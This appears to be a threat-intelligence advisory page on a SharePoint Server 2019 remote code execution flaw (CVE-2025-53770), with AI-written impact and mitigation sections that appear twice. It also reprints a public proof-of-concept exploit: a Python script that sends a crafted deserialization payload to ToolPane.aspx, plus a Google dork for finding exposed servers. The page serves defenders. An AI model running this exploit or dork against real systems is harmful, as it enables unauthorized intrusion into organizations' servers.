Microsoft SharePoint Server 2019 (16.0.10383.20020) - Remote Code Execution (RCE)
A critical remote code execution (RCE) vulnerability affects Microsoft SharePoint Server 2019 version 16. 0. 10383. 20020. This exploit allows an unauthenticated attacker to execute arbitrary code on the vulnerable server remotely, potentially leading to full system compromise. The vulnerability is exploitable without user interaction and does not require authentication, increasing its risk. Exploit code is publicly available in Python, facilitating easier exploitation by attackers. Although no known exploits are currently observed in the wild, the presence of public exploit code elevates the threat level. European organizations using this SharePoint version are at risk of data breaches, service disruption, and lateral movement within networks. Mitigation is urgent, but no official patches or updates are currently linked, requiring organizations to apply temporary workarounds and hardening measures.
AI Analysis
Technical Summary
The identified security threat is a critical remote code execution vulnerability in Microsoft SharePoint Server 2019, specifically version 16.0.10383.20020. SharePoint Server is widely used for enterprise content management and collaboration, making it a high-value target. The vulnerability allows attackers to remotely execute arbitrary code on the server without requiring authentication or user interaction, which significantly lowers the barrier to exploitation. The exploit leverages flaws in the SharePoint server's handling of certain requests, enabling attackers to inject and execute malicious payloads. Publicly available exploit code written in Python has been published on Exploit-DB (ID 52405), which can be used by attackers to automate exploitation attempts. Although no active exploitation in the wild has been reported yet, the availability of exploit code increases the likelihood of imminent attacks. The absence of official patches or mitigation guidance in the provided information suggests that organizations must rely on interim security controls such as network segmentation, strict access controls, and monitoring for suspicious activity. Given SharePoint's role in managing sensitive corporate data and workflows, successful exploitation could lead to data exfiltration, disruption of business operations, and further compromise of internal networks.
Potential Impact
For European organizations, the impact of this RCE vulnerability could be severe. SharePoint servers often host sensitive documents, internal communications, and business-critical applications. Exploitation could lead to unauthorized access to confidential information, intellectual property theft, and disruption of collaboration services. Additionally, attackers gaining code execution on SharePoint servers could pivot to other internal systems, escalating privileges and causing widespread damage. Critical sectors such as finance, healthcare, government, and manufacturing, which heavily rely on SharePoint for document management and workflow automation, would face increased risks of operational downtime and regulatory non-compliance due to data breaches. The potential for ransomware deployment or espionage activities also raises the stakes for affected organizations. The lack of patches means that the window of vulnerability remains open, increasing exposure until mitigations or updates are applied.
Mitigation Recommendations
Given the absence of official patches, European organizations should implement immediate compensating controls. These include restricting inbound access to SharePoint servers using firewalls and network segmentation, limiting SharePoint administrative privileges to the minimum necessary, and enforcing strong authentication and authorization policies. Monitoring and logging SharePoint server activity for unusual or unauthorized requests can help detect exploitation attempts early. Organizations should also consider disabling or restricting vulnerable SharePoint features or services if feasible. Applying the latest cumulative updates for SharePoint Server 2019, once available, is critical. Additionally, conducting internal vulnerability assessments and penetration tests focused on SharePoint can identify exposure. Incident response plans should be updated to address potential exploitation scenarios. Finally, educating IT staff about this vulnerability and the presence of public exploit code will improve preparedness and response.
Affected Countries
Germany, United Kingdom, France, Netherlands, Italy, Spain, Sweden, Belgium, Poland, Ireland
Indicators of Compromise
- exploit-code: # Exploit Title: Microsoft SharePoint Server 2019 – Remote Code Execution (RCE) # Google Dork: intitle:"Microsoft SharePoint" inurl:"/_layouts/15/ToolPane.aspx" # Date: 2025-08-07 # Exploit Author: Agampreet Singh (RedRoot Tool Maker – https://github.com/Agampreet-Singh/RedRoot) # Vendor Homepage: https://www.microsoft.com # Software Link: https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration # Version: SharePoint Server 2019 (16.0.10383.20020) # Tested on: Windows Server 2019 (x64) # CVE: CVE-2025-53770 #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Exploit Author: Agampreet Singh (RedRoot Tool Maker) RedRoot Repository: https://github.com/Agampreet-Singh/RedRoot This PoC demonstrates unauthenticated RCE by exploiting unsafe deserialization in SharePoint’s ToolPane.aspx via the Scorecard:ExcelDataSet control. FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY. """ import requests import base64 import gzip import re import sys def exploit_sharepoint(target_url): print(f"[+] Target: {target_url}") headers = { "Referer": "/_layouts/SignOut.aspx", "Content-Type": "application/x-www-form-urlencoded" } payload = ''' <%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %> <asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest"> <ProgressTemplate> <div class="divWaiting"> <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet> </div> </ProgressTemplate> </asp:UpdateProgress> '''.strip() data = { "MSOTlPn_Uri": target_url, "MSOTlPn_DWP": payload } try: response = requests.post( f"{target_url}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx", headers=headers, data=data, verify=False, timeout=10 ) if response.status_code != 200: print(f"[-] Unexpected HTTP response: {response.status_code}") return match = re.search(r'CompressedDataTable="([^&]+)', response.text) if not match: print("[-] No CompressedDataTable found in response.") return compressed_b64 = match.group(1) print("[+] Compressed payload extracted.") compressed_data = base64.b64decode(compressed_b64) decompressed_data = gzip.decompress(compressed_data) decoded_output = decompressed_data.decode('utf-8', errors='ignore') print("[+] Payload decoded successfully. Dumping to file...") output_file = "/tmp/sharepoint_decoded_payload.txt" with open(output_file, "w", encoding="utf-8") as f: f.write(decoded_output) print(f"[+] Saved to {output_file}") print("[*] Summary Matches:") for keyword in ["IntruderScannerDetectionPayload", "ExcelDataSet", "divWaiting", "ProgressTemplate", "Scorecard"]: if keyword in decoded_output: print(f" - Found: {keyword}") except Exception as e: print(f"[!] Exploit failed: {e}") if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python3 cve-2025-53770.py https://target.com") sys.exit(1) target = sys.argv[1].strip().rstrip('/') exploit_sharepoint(target)
Microsoft SharePoint Server 2019 (16.0.10383.20020) - Remote Code Execution (RCE)
Description
A critical remote code execution (RCE) vulnerability affects Microsoft SharePoint Server 2019 version 16. 0. 10383. 20020. This exploit allows an unauthenticated attacker to execute arbitrary code on the vulnerable server remotely, potentially leading to full system compromise. The vulnerability is exploitable without user interaction and does not require authentication, increasing its risk. Exploit code is publicly available in Python, facilitating easier exploitation by attackers. Although no known exploits are currently observed in the wild, the presence of public exploit code elevates the threat level. European organizations using this SharePoint version are at risk of data breaches, service disruption, and lateral movement within networks. Mitigation is urgent, but no official patches or updates are currently linked, requiring organizations to apply temporary workarounds and hardening measures.
AI-Powered Analysis
Technical Analysis
The identified security threat is a critical remote code execution vulnerability in Microsoft SharePoint Server 2019, specifically version 16.0.10383.20020. SharePoint Server is widely used for enterprise content management and collaboration, making it a high-value target. The vulnerability allows attackers to remotely execute arbitrary code on the server without requiring authentication or user interaction, which significantly lowers the barrier to exploitation. The exploit leverages flaws in the SharePoint server's handling of certain requests, enabling attackers to inject and execute malicious payloads. Publicly available exploit code written in Python has been published on Exploit-DB (ID 52405), which can be used by attackers to automate exploitation attempts. Although no active exploitation in the wild has been reported yet, the availability of exploit code increases the likelihood of imminent attacks. The absence of official patches or mitigation guidance in the provided information suggests that organizations must rely on interim security controls such as network segmentation, strict access controls, and monitoring for suspicious activity. Given SharePoint's role in managing sensitive corporate data and workflows, successful exploitation could lead to data exfiltration, disruption of business operations, and further compromise of internal networks.
Potential Impact
For European organizations, the impact of this RCE vulnerability could be severe. SharePoint servers often host sensitive documents, internal communications, and business-critical applications. Exploitation could lead to unauthorized access to confidential information, intellectual property theft, and disruption of collaboration services. Additionally, attackers gaining code execution on SharePoint servers could pivot to other internal systems, escalating privileges and causing widespread damage. Critical sectors such as finance, healthcare, government, and manufacturing, which heavily rely on SharePoint for document management and workflow automation, would face increased risks of operational downtime and regulatory non-compliance due to data breaches. The potential for ransomware deployment or espionage activities also raises the stakes for affected organizations. The lack of patches means that the window of vulnerability remains open, increasing exposure until mitigations or updates are applied.
Mitigation Recommendations
Given the absence of official patches, European organizations should implement immediate compensating controls. These include restricting inbound access to SharePoint servers using firewalls and network segmentation, limiting SharePoint administrative privileges to the minimum necessary, and enforcing strong authentication and authorization policies. Monitoring and logging SharePoint server activity for unusual or unauthorized requests can help detect exploitation attempts early. Organizations should also consider disabling or restricting vulnerable SharePoint features or services if feasible. Applying the latest cumulative updates for SharePoint Server 2019, once available, is critical. Additionally, conducting internal vulnerability assessments and penetration tests focused on SharePoint can identify exposure. Incident response plans should be updated to address potential exploitation scenarios. Finally, educating IT staff about this vulnerability and the presence of public exploit code will improve preparedness and response.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52405
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Microsoft SharePoint Server 2019 (16.0.10383.20020) - Remote Code Execution (RCE)
# Exploit Title: Microsoft SharePoint Server 2019 – Remote Code Execution (RCE) # Google Dork: intitle:"Microsoft SharePoint" inurl:"/_layouts/15/ToolPane.aspx" # Date: 2025-08-07 # Exploit Author: Agampreet Singh (RedRoot Tool Maker – https://github.com/Agampreet-Singh/RedRoot) # Vendor Homepage: https://www.microsoft.com # Software Link: https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration # Version: SharePoint Server 2019 (16.0.10383.20020) # Tested on: Windows Server 2019 (... (3574 more characters)
Threat ID: 689a95b8ad5a09ad002b097b
Added to database: 8/12/2025, 1:15:36 AM
Last enriched: 10/19/2025, 1:23:11 AM
Last updated: 10/19/2025, 3:22:41 PM
Views: 84
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
AI Chat Data Is History's Most Thorough Record of Enterprise Secrets. Secure It Wisely
MediumSilver Fox Expands Winos 4.0 Attacks to Japan and Malaysia via HoldingHands RAT
MediumNew .NET CAPI Backdoor Targets Russian Auto and E-Commerce Firms via Phishing ZIPs
HighEmail Bombs Exploit Lax Authentication in Zendesk
HighThreat Brief: Nation-State Actor Steals F5 Source Code and Undisclosed Vulnerabilities
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.